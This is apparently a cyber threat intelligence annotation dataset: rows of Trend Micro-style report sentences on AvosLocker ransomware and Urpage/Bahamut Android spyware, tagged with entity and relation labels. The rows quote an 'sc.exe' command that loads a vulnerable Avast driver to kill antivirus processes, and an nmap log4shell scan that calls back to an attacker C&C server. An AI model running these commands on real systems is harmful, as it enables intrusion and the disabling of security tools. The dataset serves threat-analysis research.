id
int64
1
14.4k
text
stringlengths
3
5.01k
entities
list
relations
list
Comments
list
1,817
Figure 12.
[]
[]
[]
1,818
Terminating security products running Tools and functions
[]
[]
[]
1,819
Additional tools and components were copied to the compromised machine using AnyDeskMSI to scan the local network and disable security products.
[ { "id": 46934, "label": "tools", "start_offset": 77, "end_offset": 87 }, { "id": 46936, "label": "attack-pattern", "start_offset": 91, "end_offset": 113 }, { "id": 46937, "label": "attack-pattern", "start_offset": 118, "end_offset": 143 } ]
[ { "id": 265, "from_id": 46934, "to_id": 46936, "type": "uses" }, { "id": 266, "from_id": 46934, "to_id": 46937, "type": "uses" } ]
[]
1,820
The tools transferred using AnyDesk are: Netscan: To scan for other endpoints Nmap (log4shell.nse): To scan for Log4shell vulnerable endpoints Hacking tools Mimikatz and Impacket: For lateral movement PDQ deploy: For mass deployment of malicious script to multiple endpoints Aswarpot.sys: For disabling defense solutions.
[ { "id": 46938, "label": "tools", "start_offset": 28, "end_offset": 35 }, { "id": 46944, "label": "tools", "start_offset": 158, "end_offset": 166 }, { "id": 46951, "label": "attack-pattern", "start_offset": 294, "end_offset": 321 }, { "id": 46940, "label": "tools", "start_offset": 79, "end_offset": 83 }, { "id": 46942, "label": "FILEPATH", "start_offset": 85, "end_offset": 98 }, { "id": 46947, "label": "tools", "start_offset": 171, "end_offset": 179 }, { "id": 46939, "label": "tools", "start_offset": 42, "end_offset": 49 }, { "id": 46943, "label": "vulnerability", "start_offset": 113, "end_offset": 122 }, { "id": 46950, "label": "FILEPATH", "start_offset": 276, "end_offset": 288 }, { "id": 46948, "label": "attack-pattern", "start_offset": 185, "end_offset": 201 }, { "id": 46949, "label": "attack-pattern", "start_offset": 218, "end_offset": 253 }, { "id": 46953, "label": "tools", "start_offset": 202, "end_offset": 212 }, { "id": 46956, "label": "tools", "start_offset": 276, "end_offset": 284 }, { "id": 46955, "label": "attack-pattern", "start_offset": 104, "end_offset": 108 } ]
[ { "id": 272, "from_id": 46938, "to_id": 46947, "type": "downloads" }, { "id": 267, "from_id": 46938, "to_id": 46939, "type": "downloads" }, { "id": 268, "from_id": 46938, "to_id": 46940, "type": "downloads" }, { "id": 269, "from_id": 46940, "to_id": 46942, "type": "uses" }, { "id": 271, "from_id": 46938, "to_id": 46944, "type": "downloads" }, { "id": 273, "from_id": 46938, "to_id": 46953, "type": "downloads" }, { "id": 276, "from_id": 46938, "to_id": 46956, "type": "downloads" } ]
[]
1,821
We noted that it can disable a number of antivirus products, previously identified by Aon’s researchers.
[ { "id": 45143, "label": "identity", "start_offset": 86, "end_offset": 103 } ]
[]
[]
1,822
Figure 13. Copying tools and other malicious components to the compromised machine using AnyDesk
[ { "id": 5369, "label": "tools", "start_offset": 95, "end_offset": 102 } ]
[]
[]
1,823
We found an Avast anti-rootkit driver installed as service 'asWarPot.sys' using the command sc.exe create aswSP_ArPot2 binPath= C:\windows\aswArPot.sys type= kernel.
[ { "id": 46957, "label": "FILEPATH", "start_offset": 60, "end_offset": 72 }, { "id": 46958, "label": "FILEPATH", "start_offset": 92, "end_offset": 98 }, { "id": 46959, "label": "FILEPATH", "start_offset": 129, "end_offset": 152 }, { "id": 46960, "label": "SOFTWARE", "start_offset": 12, "end_offset": 37 } ]
[ { "id": 279, "from_id": 46960, "to_id": 46957, "type": "consists-of" } ]
[]
1,824
It installs the driver file in preparation for disabling the running antivirus product.
[]
[]
[]
1,825
We noted the unusual use of cmd.exe for execution of the file.
[ { "id": 5374, "label": "malware", "start_offset": 28, "end_offset": 35 } ]
[]
[]
1,826
Figure 14.
[]
[]
[]
1,827
Executing the anti-rootkit driver in the system
[]
[]
[]
1,828
Mimikatz components were also copied to the affected machine via AnyDeskMSI.
[ { "id": 5378, "label": "tools", "start_offset": 0, "end_offset": 8 }, { "id": 46961, "label": "tools", "start_offset": 65, "end_offset": 75 } ]
[ { "id": 277, "from_id": 46961, "to_id": 5378, "type": "drops" } ]
[]
1,829
However, these components were detected and deleted.
[]
[]
[]
1,830
Figure 15.
[]
[]
[]
1,831
Detecting and deleting Mimikatz We observed the PowerShell script disabling the security products by leveraging aswarpot.sys (a legitimate Avast Anti-Rootkit Driver).
[ { "id": 5382, "label": "tools", "start_offset": 23, "end_offset": 31 }, { "id": 5383, "label": "tools", "start_offset": 53, "end_offset": 63 }, { "id": 46962, "label": "SOFTWARE", "start_offset": 144, "end_offset": 169 }, { "id": 46963, "label": "FILEPATH", "start_offset": 117, "end_offset": 129 }, { "id": 46964, "label": "attack-pattern", "start_offset": 71, "end_offset": 102 } ]
[ { "id": 278, "from_id": 46962, "to_id": 46963, "type": "consists-of" } ]
[]
1,832
A list of security product processes was supplied and subsequently terminated by the driver. Figure 16.
[]
[]
[]
1,833
Listing
[]
[]
[]
1,834
and
[]
[]
[]
1,835
terminating the security products found running in the compromised system
[]
[]
[]
1,836
Verification: Manual replication of antivirus disabling routine
[]
[]
[]
1,837
We manually replicated the routine and commands for disabling the defense solutions to further look into the routine.
[]
[]
[]
1,838
Figure 17 shows the list of processes that the routine searches on infection : EndpointBasecamp.exe Trend Micro Endpoint Basecamp ResponseService.exe PccNTMon.exe SupportConnector.exe AOTAgent.exe CETASvc.exe CETASvc iVPAgent.exe tmwscsvc.exe TMResponse AOTAgentSvc TMBMServer iVPAgent Trend Micro Web Service Communicator Tmccsf Tmlisten Ntrtscan TmWSCSvc Figure 17.
[ { "id": 46965, "label": "FILEPATH", "start_offset": 80, "end_offset": 100 }, { "id": 46966, "label": "FILEPATH", "start_offset": 131, "end_offset": 150 }, { "id": 46967, "label": "FILEPATH", "start_offset": 151, "end_offset": 163 }, { "id": 46968, "label": "FILEPATH", "start_offset": 164, "end_offset": 184 }, { "id": 46972, "label": "FILEPATH", "start_offset": 218, "end_offset": 230 }, { "id": 46969, "label": "FILEPATH", "start_offset": 185, "end_offset": 197 }, { "id": 46971, "label": "FILEPATH", "start_offset": 198, "end_offset": 209 }, { "id": 46973, "label": "FILEPATH", "start_offset": 231, "end_offset": 243 }, { "id": 46974, "label": "SOFTWARE", "start_offset": 101, "end_offset": 130 }, { "id": 46975, "label": "SOFTWARE", "start_offset": 287, "end_offset": 323 } ]
[]
[]
1,839
Searching for processes We found that aswArPot.sys, registered as aswSP_ArPot2 as a service, is used as the handle for the following DeviceIoControl call.
[ { "id": 45144, "label": "FILEPATH", "start_offset": 42, "end_offset": 54 } ]
[]
[]
1,840
Figure 18.
[]
[]
[]
1,841
Driver file preparing to disable an antivirus product The DeviceIoControl function is used to execute parts of the driver.
[]
[]
[]
1,842
In this case, the DeviceIoControl is inside a loop that iterates through the list of processes mentioned above.
[]
[]
[]
1,843
Additionally, we can see that 0x9988C094 is passed to DeviceIoControl as an argument simultaneous to the ID of the current process in the iteration.
[]
[]
[]
1,844
Figure 19.
[]
[]
[]
1,845
DeviceIoControl as an argument with the current process ID
[]
[]
[]
1,846
Inside aswArPot.sys, we saw 0x9988C094 in a switch case with a function sub_14001DC80 case.
[ { "id": 46976, "label": "FILEPATH", "start_offset": 7, "end_offset": 19 } ]
[]
[]
1,847
Inside function sub_14001DC80, we can see that that function has the capability to terminate a given process.
[]
[]
[]
1,848
Figure 20. 0x9988C094 in a switch case with sub_14001DC80 (above), with the latter value terminating a process (below).
[]
[]
[]
1,849
Other executions and lateral movement
[ { "id": 46977, "label": "attack-pattern", "start_offset": 25, "end_offset": 41 } ]
[]
[]
1,850
After disabling the security products, the actors behind AvosLocker again tried to transfer other tools, namely Mimikatz and Impacket.
[ { "id": 46979, "label": "tools", "start_offset": 112, "end_offset": 120 }, { "id": 46978, "label": "malware", "start_offset": 57, "end_offset": 67 }, { "id": 46980, "label": "tools", "start_offset": 125, "end_offset": 133 } ]
[ { "id": 280, "from_id": 46978, "to_id": 46979, "type": "downloads" }, { "id": 281, "from_id": 46978, "to_id": 46980, "type": "downloads" } ]
[]
1,851
Figure 21. Execution of Mimikatz (above) and Impacket via C:\temp\wmiexec.exe (below)
[ { "id": 45148, "label": "tools", "start_offset": 50, "end_offset": 58 }, { "id": 45146, "label": "tools", "start_offset": 29, "end_offset": 37 }, { "id": 45147, "label": "FILEPATH", "start_offset": 63, "end_offset": 82 } ]
[]
[]
1,852
We also observed the execution of a password recovery tool XenArmor with C:\temp\pass\start.exe.
[ { "id": 46982, "label": "tools", "start_offset": 63, "end_offset": 71 }, { "id": 46981, "label": "FILEPATH", "start_offset": 77, "end_offset": 99 } ]
[ { "id": 282, "from_id": 46982, "to_id": 46981, "type": "consists-of" } ]
[]
1,853
Figure 22. XenArmor password recovery tool execution
[ { "id": 46983, "label": "tools", "start_offset": 16, "end_offset": 24 } ]
[]
[]
1,854
We observed the attackers using an NMAP script to check for Log4shell, the Apache Log4j remote code execution (RCE, with ID CVE-2021-44228) vulnerability across the network.
[ { "id": 45150, "label": "vulnerability", "start_offset": 60, "end_offset": 69 }, { "id": 45149, "label": "tools", "start_offset": 35, "end_offset": 39 }, { "id": 45152, "label": "vulnerability", "start_offset": 75, "end_offset": 109 }, { "id": 45153, "label": "vulnerability", "start_offset": 124, "end_offset": 138 } ]
[]
[]
1,855
They used the command nmap --script log4shell.nse --script-args log4shell.waf-bypass=true --script-args log4shell.callback-server=xx.xx.xx.xx:1389 -p 80,443 xx.xx.xx.xx/xx, and set the callback server to the attacker group C&C server. Figure 23.
[ { "id": 5436, "label": "tools", "start_offset": 22, "end_offset": 26 } ]
[]
[]
1,856
Checking for log4shell We also observed more system network configuration discovery techniques being run, possibly for lateral movement as it tried looking for other available endpoints.
[ { "id": 5440, "label": "attack-pattern", "start_offset": 49, "end_offset": 87 }, { "id": 46984, "label": "attack-pattern", "start_offset": 123, "end_offset": 139 } ]
[]
[]
1,857
Figure 24. Running more system network configuration discovery scans
[ { "id": 5442, "label": "attack-pattern", "start_offset": 29, "end_offset": 67 } ]
[]
[]
1,858
Deploying across the network We saw software deployment tool PDQ being used to deploy malicious batch scripts to multiple endpoints in the network.
[ { "id": 46986, "label": "attack-pattern", "start_offset": 83, "end_offset": 113 }, { "id": 46985, "label": "tools", "start_offset": 65, "end_offset": 68 } ]
[ { "id": 283, "from_id": 46986, "to_id": 46985, "type": "uses" } ]
[]
1,859
Figure 25. Deploying malicious batch scripts to other endpoints The deployed batch script has the following commands: Disable Windows Update and Microsoft Defender Figure 26. Disable Microsoft defense services Prevents safeboot execution of security products Figure 27. Prevent security products’ execution Create new administrator account Figure 28. Create new account Add the AutoStart mechanism for the AvosLocker executable (update.exe) Figure 29. Add Autostart for ransomware executable Disables legal notice caption Figure 30. Disable legal notice Set safeboot with networking and disables Windows Error Recovery and reboot Figure 31. Setting and disabling network and specific Windows functions Conclusion
[ { "id": 46990, "label": "malware", "start_offset": 449, "end_offset": 459 }, { "id": 46991, "label": "FILEPATH", "start_offset": 472, "end_offset": 482 }, { "id": 46987, "label": "tools", "start_offset": 136, "end_offset": 150 }, { "id": 46988, "label": "tools", "start_offset": 155, "end_offset": 173 } ]
[]
[]
1,860
While AvosLocker has been documented for its abuse of AnyDesk for lateral movement as its preferred application, we note that other remote access applications can also be abused to replace it.
[ { "id": 45154, "label": "malware", "start_offset": 6, "end_offset": 16 }, { "id": 45155, "label": "tools", "start_offset": 54, "end_offset": 61 }, { "id": 45156, "label": "attack-pattern", "start_offset": 66, "end_offset": 82 } ]
[ { "id": 77, "from_id": 45154, "to_id": 45155, "type": "uses" }, { "id": 284, "from_id": 45156, "to_id": 45155, "type": "uses" }, { "id": 285, "from_id": 45154, "to_id": 45156, "type": "uses" } ]
[]
1,861
We think the same can be said for the software deployment tool, wherein the malicious actors can subsequently decide to replace and abuse it with other commercially available ones.
[]
[]
[]
1,862
In addition, aside from its availability, the decision to choose the specific rootkit driver file is for its capability to execute in kernel mode (therefore operating at a high privilege).
[]
[]
[]
1,863
This variant is also capable of modifying other details of the installed security solutions, such as disabling the legal notice.
[]
[]
[]
1,864
Other modern ransomware, such as Mespinoza/Pysa, modify the registries of infected systems during their respective routines to inform their victims that they have been compromised.
[ { "id": 5472, "label": "threat-actor", "start_offset": 43, "end_offset": 47 }, { "id": 5471, "label": "threat-actor", "start_offset": 33, "end_offset": 42 } ]
[]
[]
1,865
Similar to previously documented malware and ransomware groups, AvosLocker takes advantage of the different vulnerabilities that have yet to be patched to get into organizations’ networks.
[ { "id": 5474, "label": "malware", "start_offset": 64, "end_offset": 74 } ]
[]
[]
1,866
Once inside, the continuing trend of abusing legitimate tools and functions to mask malicious activities and actors’ presence
[]
[]
[]
1,867
grows in sophistication.
[]
[]
[]
1,868
In this case, the attackers were able to study and use Avast’s driver as part of their arsenal to disable other vendors’ security products.
[ { "id": 46992, "label": "identity", "start_offset": 55, "end_offset": 61 } ]
[]
[]
1,869
However, and specific to this instance, the attempt to kill an antivirus product such as this variant’s TaskKill can also be foiled.
[]
[]
[]
1,870
In this example using Trend Micro Vision One, the attempt was unsuccessful likely due to the product’s self-protection feature, which allowed the sensors to continue sending data and block the noted routine.
[ { "id": 46993, "label": "SOFTWARE", "start_offset": 22, "end_offset": 44 } ]
[]
[]
1,871
The visibility enabled by the platform allowed us as researchers to capture the extent of this ransomware’s attack chain and replicate the driver file being abused to verify its function during compromise.
[]
[]
[]
1,872
Avast responded to our notification with this statement: "We can confirm the vulnerability in an old version of our driver aswArPot.sys, which we fixed in our Avast 21.5 released in June 2021.
[ { "id": 45157, "label": "FILEPATH", "start_offset": 123, "end_offset": 135 }, { "id": 45158, "label": "SOFTWARE", "start_offset": 159, "end_offset": 169 }, { "id": 45159, "label": "TIME", "start_offset": 182, "end_offset": 191 }, { "id": 45160, "label": "identity", "start_offset": 0, "end_offset": 5 } ]
[ { "id": 286, "from_id": 45158, "to_id": 45157, "type": "consists-of" } ]
[]
1,873
We also worked closely with Microsoft, so they released a block in the Windows operating system (10 and 11), so the old version of the Avast driver can't be loaded to memory.
[ { "id": 46995, "label": "SOFTWARE", "start_offset": 71, "end_offset": 107 }, { "id": 46994, "label": "identity", "start_offset": 28, "end_offset": 37 }, { "id": 46996, "label": "SOFTWARE", "start_offset": 135, "end_offset": 147 } ]
[]
[]
1,874
The below example shows that the blocking works (output from the "sc start" command):
[]
[]
[]
1,875
(SC) StartService FAILED 1275: This driver has been blocked from loading
[]
[]
[]
1,876
The update from Microsoft for the Windows operating system was published in February as an optional update, and in Microsoft's security release in April, so fully updated machines running Windows 10 and 11 are not vulnerable to this kind of attack.
[ { "id": 46997, "label": "SOFTWARE", "start_offset": 34, "end_offset": 58 }, { "id": 46998, "label": "TIME", "start_offset": 76, "end_offset": 84 }, { "id": 47000, "label": "identity", "start_offset": 115, "end_offset": 124 }, { "id": 47001, "label": "TIME", "start_offset": 147, "end_offset": 152 }, { "id": 46999, "label": "identity", "start_offset": 16, "end_offset": 25 }, { "id": 47002, "label": "SOFTWARE", "start_offset": 188, "end_offset": 205 } ]
[]
[]
1,877
All consumer and business antivirus versions of Avast and AVG detect and block this AvosLocker ransomware variant, so our users are protected from this attack vector.
[ { "id": 47003, "label": "SOFTWARE", "start_offset": 48, "end_offset": 53 }, { "id": 47004, "label": "SOFTWARE", "start_offset": 58, "end_offset": 61 }, { "id": 47005, "label": "malware", "start_offset": 84, "end_offset": 94 } ]
[]
[]
1,878
For users of third-party antivirus software, to stay protected against this vulnerability, we recommend users to update their Windows operating system with the latest security updates, and to use a fully updated antivirus program."
[ { "id": 47006, "label": "SOFTWARE", "start_offset": 126, "end_offset": 143 } ]
[]
[]
1,879
Indicators of Compromise (IOCs) File SHA256 Detection Malicious batch file component a5ad3355f55e1a15baefea83ce81d038531af516f47716018b1dedf04f081f15
[ { "id": 5521, "label": "SHA1", "start_offset": 91, "end_offset": 155 } ]
[]
[]
1,880
Trojan
[]
[]
[]
1,881
BAT.KILLAV.YACAA
[]
[]
[]
1,882
AvosLocker executable 05ba2df0033e3cd5b987d66b6de545df439d338a20165c0ba96cde8a74e463e5 Ransom.Win32.AVOSLOCKER.SMYXBLNT Mimikatz executable (x32 and x64) 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 HackTool.Win64.MIMIKATZ.ZTJA e81a8f8ad804c4d83869d7806a303ff04f31cce376c5df8aada2e9db2c1eeb98 HackTool.Win32.Mimikatz.CNFW Log4shell Nmap NSE script ddcb0e99f27e79d3536a15e0d51f7f33c38b2ae48677570f36f5e92863db5a96 Backdoor.Win32.CVE202144228.YACAH Impacket tool 14f0c4ce32821a7d25ea5e016ea26067d6615e3336c3baa854ea37a290a462a8 HackTool.Win32.Impacket.AA
[ { "id": 5525, "label": "tools", "start_offset": 120, "end_offset": 128 }, { "id": 5529, "label": "tools", "start_offset": 352, "end_offset": 356 }, { "id": 5523, "label": "SHA2", "start_offset": 22, "end_offset": 86 }, { "id": 5530, "label": "SHA2", "start_offset": 368, "end_offset": 432 }, { "id": 5522, "label": "malware", "start_offset": 0, "end_offset": 10 }, { "id": 5527, "label": "SHA2", "start_offset": 154, "end_offset": 218 }, { "id": 5528, "label": "SHA2", "start_offset": 248, "end_offset": 312 }, { "id": 5533, "label": "SHA2", "start_offset": 481, "end_offset": 545 }, { "id": 5531, "label": "tools", "start_offset": 467, "end_offset": 475 }, { "id": 47007, "label": "tools", "start_offset": 546, "end_offset": 572 }, { "id": 47009, "label": "tools", "start_offset": 219, "end_offset": 247 }, { "id": 47011, "label": "vulnerability", "start_offset": 342, "end_offset": 351 }, { "id": 47012, "label": "malware", "start_offset": 87, "end_offset": 119 }, { "id": 47008, "label": "tools", "start_offset": 313, "end_offset": 341 }, { "id": 47010, "label": "tools", "start_offset": 433, "end_offset": 466 } ]
[ { "id": 288, "from_id": 47012, "to_id": 5522, "type": "duplicate-of" }, { "id": 287, "from_id": 5522, "to_id": 5523, "type": "consists-of" } ]
[]
1,883
Tags Malware | Exploits & Vulnerabilities | Cyber Threats | APT & Targeted Attacks | Compliance & Risks | Endpoints | Ransomware | Network | Articles, News, Reports
[]
[]
[]
1,884
In the process of monitoring changes in the threat landscape, we get a clearer insight into the way threat actors work behind the schemes.
[]
[]
[]
1,885
In this case we dig deeper into the possible connection between cyberattacks by focusing on the similarities an unnamed threat actor shares with Confucius, Patchwork, and another threat actor called Bahamut.
[ { "id": 47014, "label": "threat-actor", "start_offset": 156, "end_offset": 165 }, { "id": 47013, "label": "threat-actor", "start_offset": 145, "end_offset": 154 }, { "id": 47015, "label": "threat-actor", "start_offset": 199, "end_offset": 206 } ]
[]
[]
1,886
For the sake of this report, we will call this unnamed threat actor “Urpage.”
[ { "id": 47016, "label": "threat-actor", "start_offset": 69, "end_offset": 75 } ]
[]
[]
1,887
What sets Urpage attacks apart is its targeting of InPage, a word processor for Urdu and Arabic languages.
[ { "id": 45163, "label": "SOFTWARE", "start_offset": 51, "end_offset": 57 }, { "id": 45162, "label": "threat-actor", "start_offset": 10, "end_offset": 16 } ]
[ { "id": 78, "from_id": 45162, "to_id": 45163, "type": "targets" } ]
[]
1,888
However, its Delphi backdoor component, which it has in common with Confucius and Patchwork, and its apparent use of Bahamut-like malware, is what makes it more intriguing as it connects Urpage to these other known threats.
[ { "id": 47017, "label": "threat-actor", "start_offset": 68, "end_offset": 77 }, { "id": 47019, "label": "threat-actor", "start_offset": 82, "end_offset": 91 }, { "id": 47020, "label": "threat-actor", "start_offset": 117, "end_offset": 124 }, { "id": 47021, "label": "threat-actor", "start_offset": 187, "end_offset": 193 } ]
[]
[]
1,889
In our previous entry, we already covered the Delphi component in the context of the Confucius and Patchwork connection.
[ { "id": 47022, "label": "threat-actor", "start_offset": 85, "end_offset": 94 }, { "id": 47023, "label": "threat-actor", "start_offset": 99, "end_offset": 108 } ]
[]
[]
1,890
We mentioned Urpage as a third unnamed threat actor connected to the two.
[ { "id": 45164, "label": "threat-actor", "start_offset": 13, "end_offset": 19 } ]
[]
[]
1,891
This time, we look into Urpage to gain a deeper insight into the way several threat actors' actions intersect.
[ { "id": 47024, "label": "threat-actor", "start_offset": 24, "end_offset": 30 } ]
[]
[]
1,892
The Bahamut Link Fake websites
[ { "id": 5568, "label": "threat-actor", "start_offset": 4, "end_offset": 11 } ]
[]
[]
1,893
The link between Bahamut and Urpage can be best discussed by way of the multiple malicious Android samples that matched Bahamut's code and had C&C belonging to the Urpage infrastructure.
[ { "id": 45170, "label": "Infrastucture", "start_offset": 143, "end_offset": 146 }, { "id": 45167, "label": "threat-actor", "start_offset": 120, "end_offset": 128 }, { "id": 5570, "label": "threat-actor", "start_offset": 17, "end_offset": 24 }, { "id": 5572, "label": "threat-actor", "start_offset": 29, "end_offset": 35 }, { "id": 5578, "label": "threat-actor", "start_offset": 164, "end_offset": 170 }, { "id": 47025, "label": "SOFTWARE", "start_offset": 91, "end_offset": 106 } ]
[ { "id": 289, "from_id": 5570, "to_id": 5572, "type": "related-to" } ]
[]
1,894
Some of these C&C websites also act as phishing sites that lure users into downloading these very applications.
[ { "id": 47026, "label": "attack-pattern", "start_offset": 39, "end_offset": 47 } ]
[]
[]
1,895
The threat actor sets up these fake websites describing the application and linking to the Google Play Store to download it, like in the case of the malicious website, pikrpro[.]eu, seen below Another sample website involved the use of a closely copied version of an existing website, with slight changes in the logo and options above the page.
[ { "id": 47027, "label": "SOFTWARE", "start_offset": 91, "end_offset": 108 }, { "id": 47028, "label": "DOMAIN", "start_offset": 168, "end_offset": 180 } ]
[]
[]
1,896
The download links were also replaced to download the malicious Android application instead.
[ { "id": 45171, "label": "SOFTWARE", "start_offset": 64, "end_offset": 71 } ]
[]
[]
1,897
Figure 1.
[]
[]
[]
1,898
Original (top) and modified (bottom) website
[]
[]
[]
1,899
Upon writing this entry, we’ve coordinated with Google to ensure that the malicious applications these C&C sites advertise are no longer available for download on the Google Play Store.
[ { "id": 45172, "label": "identity", "start_offset": 48, "end_offset": 54 }, { "id": 45173, "label": "SOFTWARE", "start_offset": 167, "end_offset": 184 } ]
[]
[]
1,900
It is important to note however, that not all C&C websites for Urpage advertise malicious applications.
[ { "id": 5595, "label": "threat-actor", "start_offset": 63, "end_offset": 69 } ]
[]
[]
1,901
Some simply contain a random template with empty categories, likely as a ploy to hide its malicious activities.
[]
[]
[]
1,902
Android targeting
[ { "id": 45174, "label": "SOFTWARE", "start_offset": 0, "end_offset": 7 } ]
[]
[]
1,903
As with Bahamut applications, once downloaded and executed, it showed multiple malicious features that deal with stealing information.
[ { "id": 47030, "label": "attack-pattern", "start_offset": 113, "end_offset": 133 }, { "id": 47029, "label": "threat-actor", "start_offset": 8, "end_offset": 15 } ]
[ { "id": 290, "from_id": 47029, "to_id": 47030, "type": "uses" } ]
[]
1,904
Some of these features are listed below.
[]
[]
[]
1,905
Retrieves basic information like network information and MAC address from an infected phone SMS stealing Contacts stealing Audio recording GPS location retrieval Steals files with the specific extensions, although not all samples target these extensions.
[]
[]
[]
1,906
File type File extensions Document files .txt, .csv, .doc, .docx, .xls, .xlsx, .pdf WhatsApp databases .db.crypt5 to .db.crypt12 Geolocation related files .kml, .kmz, .gmx, .aqm Audio files .mp3, .opus Videos .mp4, .amr, .wmv, .3gp, Pictures .jpeg, .jpg
[ { "id": 47031, "label": "SOFTWARE", "start_offset": 86, "end_offset": 94 } ]
[]
[]
1,907
Of note is one specific application that had a different purpose from the others.
[]
[]
[]
1,908
This application has the same encryption routine as other Urpage applications.
[ { "id": 45175, "label": "threat-actor", "start_offset": 58, "end_offset": 64 } ]
[]
[]
1,909
Instead of stealing documents or images, it works on top of a modified version of the legitimate Threema, an end-to-end encrypted messaging application, to steal screenshots of messages.
[ { "id": 47032, "label": "SOFTWARE", "start_offset": 97, "end_offset": 104 } ]
[]
[]
1,910
This application has the same icon and label as the legitimate Threema.
[ { "id": 47033, "label": "SOFTWARE", "start_offset": 63, "end_offset": 70 } ]
[]
[]
1,911
Once launched, it drops a modified APK version of Threema and prompts the user to install the application.
[ { "id": 45176, "label": "SOFTWARE", "start_offset": 50, "end_offset": 57 } ]
[]
[]
1,912
The malicious application then hides its icon on the device but still runs in the background, while the modified Threema works like normal.
[ { "id": 47034, "label": "SOFTWARE", "start_offset": 113, "end_offset": 120 } ]
[]
[]
1,913
Unknown to the user, the code in the modified Threema allows it to take screenshots of itself every 10 seconds.
[ { "id": 5617, "label": "TIME", "start_offset": 94, "end_offset": 110 }, { "id": 47035, "label": "SOFTWARE", "start_offset": 46, "end_offset": 53 } ]
[]
[]
1,914
These images are stored in the location/sdcard/Android/data/ch.threema.app/DataData directory, while the “dropper” or the malicious application working in the background uploads the images to the C&C for the threat actor to access.
[ { "id": 45177, "label": "FILEPATH", "start_offset": 39, "end_offset": 83 }, { "id": 45178, "label": "Infrastucture", "start_offset": 196, "end_offset": 199 } ]
[]
[]
1,915
Figure 2. Comparison of legitimate Threema code (left) to the modified version (right) with the inserted code
[ { "id": 47036, "label": "SOFTWARE", "start_offset": 35, "end_offset": 42 } ]
[]
[]
1,916
Other activities
[]
[]
[]